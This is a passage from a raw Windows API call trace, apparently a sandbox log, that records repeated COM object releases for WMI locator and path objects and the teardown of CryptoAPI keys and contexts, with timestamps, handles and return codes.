(This=0x6736f48) returned 0x1 [0192.003] WbemLocator:IUnknown:Release (This=0x6736f48) returned 0x0 [0192.003] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0192.003] WbemLocator:IUnknown:Release (This=0x6737098) returned 0x1 [0192.003] WbemLocator:IUnknown:Release (This=0x6737098) returned 0x0 [0192.003] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0192.003] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0192.004] CryptReleaseContext (hProv=0x7a8870, dwFlags=0x0) returned 1 [0192.004] CryptReleaseContext (hProv=0x7aa168, dwFlags=0x0) returned 1 [0192.004] CryptDestroyKey (hKey=0x77b2b0) returned 1 [0192.005] CryptReleaseContext (hProv=0x7aa168, dwFlags=0x0) returned 1 [0192.006] CryptDestroyKey (hKey=0x77adb0) returned 1 [0192.006] CryptReleaseContext (hProv=0x7a9f48, dwFlags=0x0) returned 1 [0192.006] CryptReleaseContext (hProv=0x7a9f48, dwFlags=0x0) returned 1 [0194.046] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0194.046] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0194.046] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x1 [0194.046] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x0 [0194.046] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0194.046] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0194.046] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0194.046] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0194.046] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x1 [0194.046] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x0 [0194.046] IUnknown:Release (This=0x673bf90) returned 0x0 [0194.046] IUnknown:Release (This=0x673c128) returned 0x0 [0194.047] IUnknown:Release (This=0x673bac8) returned 0x0 [0194.047] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0194.047] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0194.048] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0194.048] CryptDestroyKey (hKey=0x77adb0) returned 1 [0194.048] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0194.048] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0196.085] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0196.085] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0196.085] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x0 [0196.086] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0196.086] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.086] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x1 [0196.086] WbemLocator:IUnknown:Release (This=0x6736ec8) returned 0x0 [0196.086] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.086] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0196.086] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x0 [0196.331] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.331] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0196.331] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x0 [0196.332] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0196.332] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0196.332] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x0 [0196.332] IUnknown:Release (This=0x673c128) returned 0x0 [0196.332] IUnknown:Release (This=0x673bac8) returned 0x0 [0196.333] CryptDestroyKey (hKey=0x77adf0) returned 1 [0196.333] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0196.333] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0197.307] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0197.307] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.307] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0197.307] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x0 [0197.307] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x0 [0197.308] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x0 [0197.308] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0197.308] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x0 [0197.308] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0197.308] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.308] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0197.308] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x0 [0197.478] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.478] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0197.478] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x0 [0197.478] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.478] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x1 [0197.478] WbemLocator:IUnknown:Release (This=0x6737088) returned 0x0 [0197.478] IUnknown:Release (This=0x673bf90) returned 0x0 [0197.478] CryptDestroyKey (hKey=0x77adf0) returned 1 [0197.478] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0197.479] CryptReleaseContext (hProv=0x7a9c18, dwFlags=0x0) returned 1 [0197.479] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0197.479] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0197.479] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0197.931] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0197.931] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.931] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x1 [0197.931] WbemLocator:IUnknown:Release (This=0x6737068) returned 0x0 [0197.931] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0197.931] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0197.931] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x0 [0198.123] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0198.123] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0198.124] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0198.124] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0198.124] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0198.124] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0198.124] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x0 [0198.124] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0198.124] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0198.124] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x0 [0198.124] IUnknown:Release (This=0x673bac8) returned 0x0 [0198.124] CryptDestroyKey (hKey=0x77b2b0) returned 1 [0198.124] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0198.124] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0199.584] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0199.584] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.584] WbemLocator:IUnknown:Release (This=0x67370a8) returned 0x1 [0199.584] WbemLocator:IUnknown:Release (This=0x67370a8) returned 0x0 [0199.584] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.584] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0199.584] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0199.584] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.584] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0199.584] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x0 [0199.584] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.584] WbemLocator:IUnknown:Release (This=0x781924) returned 0x1 [0199.584] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x0 [0199.668] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0199.668] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.668] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0199.668] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x0 [0199.668] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0199.669] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0199.669] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x0 [0199.669] IUnknown:Release (This=0x673bf90) returned 0x0 [0199.669] IUnknown:Release (This=0x673bac8) returned 0x0 [0199.669] IUnknown:Release (This=0x673c128) returned 0x0 [0199.670] CryptDestroyKey (hKey=0x77b570) returned 1 [0199.670] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0199.670] CryptReleaseContext (hProv=0x7a8cb0, dwFlags=0x0) returned 1 [0199.670] CryptDestroyKey (hKey=0x77adf0) returned 1 [0199.670] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0199.670] CryptReleaseContext (hProv=0x7a9178, dwFlags=0x0) returned 1 [0199.671] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0199.671] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0199.671] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0200.100] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738770) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738c40) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0200.100] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0200.100] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.100] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0200.100] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x0 [0200.101] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.101] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0200.101] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x0 [0200.257] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.257] WbemLocator:IUnknown:Release (This=0x781654) returned 0x1 [0200.257] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x0 [0200.673] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0200.673] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0200.673] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x0 [0200.675] IUnknown:Release (This=0x673c128) returned 0x0 [0200.675] CryptDestroyKey (hKey=0x77b070) returned 1 [0200.676] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0200.676] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0202.485] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0202.485] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.485] WbemLocator:IUnknown:Release (This=0x781ce4) returned 0x1 [0202.485] WbemLocator:IUnknown:Release (This=0x67482bc) returned 0x0 [0202.766] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.766] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x1 [0202.766] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x0 [0202.766] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.766] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x1 [0202.766] WbemLocator:IUnknown:Release (This=0x6736f38) returned 0x0 [0202.766] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0202.766] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.766] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x1 [0202.766] WbemDefPath:IUnknown:Release (This=0x6738850) returned 0x0 [0202.766] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.766] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x1 [0202.766] WbemDefPath:IUnknown:Release (This=0x67387e0) returned 0x0 [0202.766] IUnknown:Release (This=0x673bac8) returned 0x0 [0202.766] IUnknown:Release (This=0x673c128) returned 0x0 [0202.767] IUnknown:Release (This=0x673bf90) returned 0x0 [0202.767] IUnknown:Release (This=0x673b468) returned 0x0 [0202.767] CryptDestroyKey (hKey=0x77adf0) returned 1 [0202.767] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0202.767] CryptReleaseContext (hProv=0x7a9970, dwFlags=0x0) returned 1 [0202.767] CryptDestroyKey (hKey=0x77aeb0) returned 1 [0202.767] CryptReleaseContext (hProv=0x7a8fe0, dwFlags=0x0) returned 1 [0202.767] CryptReleaseContext (hProv=0x7a8fe0, dwFlags=0x0) returned 1 [0202.877] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0202.877] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.877] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x1 [0202.877] WbemDefPath:IUnknown:Release (This=0x6738b60) returned 0x0 [0202.877] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.877] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x1 [0202.877] WbemDefPath:IUnknown:Release (This=0x6738460) returned 0x0 [0202.878] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x1 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738a80) returned 0x0 [0202.878] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x1 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738a10) returned 0x0 [0202.878] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x1 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738700) returned 0x0 [0202.878] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.878] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x1 [0202.878] WbemDefPath:IUnknown:Release (This=0x67388c0) returned 0x0 [0202.878] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x1 [0202.878] WbemDefPath:IUnknown:Release (This=0x6738620) returned 0x0 [0202.879] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.879] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x1 [0202.879] WbemDefPath:IUnknown:Release (This=0x6738af0) returned 0x0 [0202.879] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0202.879] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0202.879] WbemLocator:IUnknown:Release (This=0x781b04) returned 0x1 [0202.879] WbemLocator:IUnknown:Release (This=0x674815c) returned 0x0 [0203.078] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.078] WbemLocator:IUnknown:Release (This=0x781a14) returned 0x1 [0203.078] WbemLocator:IUnknown:Release (This=0x67481b4) returned 0x0 [0203.079] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.079] WbemLocator:IUnknown:Release (This=0x781dd4) returned 0x1 [0203.079] WbemLocator:IUnknown:Release (This=0x6748264) returned 0x0 [0203.080] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.080] WbemLocator:IUnknown:Release (This=0x781564) returned 0x1 [0203.080] WbemLocator:IUnknown:Release (This=0x6748314) returned 0x0 [0203.080] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.080] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x1 [0203.080] WbemLocator:IUnknown:Release (This=0x6736e68) returned 0x0 [0203.080] IUnknown:Release (This=0x673b468) returned 0x0 [0203.081] CryptDestroyKey (hKey=0x77b130) returned 1 [0203.081] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0203.081] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0203.082] CryptDestroyKey (hKey=0x77ad30) returned 1 [0203.082] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0203.082] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0203.811] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0203.811] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.811] WbemLocator:IUnknown:Release (This=0x67370f8) returned 0x1 [0203.811] WbemLocator:IUnknown:Release (This=0x67370f8) returned 0x0 [0203.811] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.811] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x1 [0203.812] WbemLocator:IUnknown:Release (This=0x67370e8) returned 0x0 [0203.812] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0203.812] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x1 [0203.812] WbemLocator:IUnknown:Release (This=0x6736ee8) returned 0x0 [0203.812] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0203.812] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0203.812] CryptReleaseContext (hProv=0x7a8650, dwFlags=0x0) returned 1 [0205.435] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0205.435] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0205.435] WbemLocator:IUnknown:Release (This=0x781fb4) returned 0x1 [0205.435] WbemLocator:IUnknown:Release (This=0x6747f4c) returned 0x0 [0209.574] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.574] WbemLocator:IUnknown:Release (This=0x781ec4) returned 0x1 [0209.574] WbemLocator:IUnknown:Release (This=0x672f0fc) returned 0x0 [0209.576] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.576] WbemLocator:IUnknown:Release (This=0x780c04) returned 0x1 [0209.577] WbemLocator:IUnknown:Release (This=0x674820c) returned 0x0 [0209.578] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.578] WbemLocator:IUnknown:Release (This=0x6737048) returned 0x1 [0209.578] WbemLocator:IUnknown:Release (This=0x6737048) returned 0x0 [0209.578] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.578] WbemLocator:IUnknown:Release (This=0x781bf4) returned 0x1 [0209.578] WbemLocator:IUnknown:Release (This=0x6747fa4) returned 0x0 [0209.579] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.579] WbemLocator:IUnknown:Release (This=0x7820a4) returned 0x1 [0209.579] WbemLocator:IUnknown:Release (This=0x6747ffc) returned 0x0 [0209.579] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.579] WbemLocator:IUnknown:Release (This=0x782194) returned 0x1 [0209.580] WbemLocator:IUnknown:Release (This=0x6748054) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6734060) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6734060) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733ff0) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733ff0) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733f80) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733f80) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733f10) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733f10) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733ea0) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733ea0) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733e30) returned 0x1 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733e30) returned 0x0 [0209.580] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.580] WbemDefPath:IUnknown:Release (This=0x6733dc0) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6733dc0) returned 0x0 [0209.581] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.581] WbemDefPath:IUnknown:Release (This=0x6733d50) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6733d50) returned 0x0 [0209.581] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738d20) returned 0x0 [0209.581] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738cb0) returned 0x0 [0209.581] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738bd0) returned 0x0 [0209.581] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x1 [0209.581] WbemDefPath:IUnknown:Release (This=0x6738690) returned 0x0 [0209.581] IUnknown:Release (This=0x673b468) returned 0x0 [0209.581] IUnknown:Release (This=0x673c128) returned 0x0 [0209.582] IUnknown:Release (This=0x673bdf8) returned 0x0 [0209.582] IUnknown:Release (This=0x673c2c0) returned 0x0 [0209.582] IUnknown:Release (This=0x673bf90) returned 0x0 [0209.583] CryptDestroyKey (hKey=0x77adf0) returned 1 [0209.583] CryptReleaseContext (hProv=0x7a95b8, dwFlags=0x0) returned 1 [0209.583] CryptDestroyKey (hKey=0x77b0b0) returned 1 [0209.583] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0209.584] CryptReleaseContext (hProv=0x7a94a8, dwFlags=0x0) returned 1 [0209.584] CryptReleaseContext (hProv=0x7a95b8, dwFlags=0x0) returned 1 [0209.584] CryptDestroyKey (hKey=0x77b3b0) returned 1 [0209.584] CryptReleaseContext (hProv=0x7a9398, dwFlags=0x0) returned 1 [0209.584] CryptReleaseContext (hProv=0x7a9398, dwFlags=0x0) returned 1 [0209.584] CryptDestroyKey (hKey=0x77b5b0) returned 1 [0209.584] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0209.585] CryptReleaseContext (hProv=0x7a9310, dwFlags=0x0) returned 1 [0209.585] CryptDestroyKey (hKey=0x77b470) returned 1 [0209.585] CryptReleaseContext (hProv=0x7a9ec0, dwFlags=0x0) returned 1 [0209.585] CryptReleaseContext (hProv=0x7a9ec0, dwFlags=0x0) returned 1 [0209.586] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0209.586] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.586] WbemLocator:IUnknown:Release (This=0x6736ed8) returned 0x1 [0209.586] WbemLocator:IUnknown:Release (This=0x6736ed8) returned 0x0 [0209.586] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.586] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x1 [0209.587] WbemLocator:IUnknown:Release (This=0x6737038) returned 0x0 [0209.587] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0209.587] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x1 [0209.587] WbemLocator:IUnknown:Release (This=0x6736f28) returned 0x0 [0211.379] IUnknown:Release (This=0x673b468) returned 0x0 [0211.379] IUnknown:Release (This=0x673c128) returned 0x0 [0211.379] IUnknown:Release (This=0x673bdf8) returned 0x0 [0212.391] CoGetContextToken (in: pToken=0x558f890 | out: pToken=0x558f890) returned 0x0 [0212.391] CoGetContextToken (in: pToken=0x558f818 | out: pToken=0x558f818) returned 0x0 [0212.391] WbemLocator:IUnknown:Release 